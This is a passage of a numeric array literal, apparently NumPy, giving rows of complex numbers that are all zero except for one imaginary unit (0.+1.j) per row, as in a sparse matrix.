0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
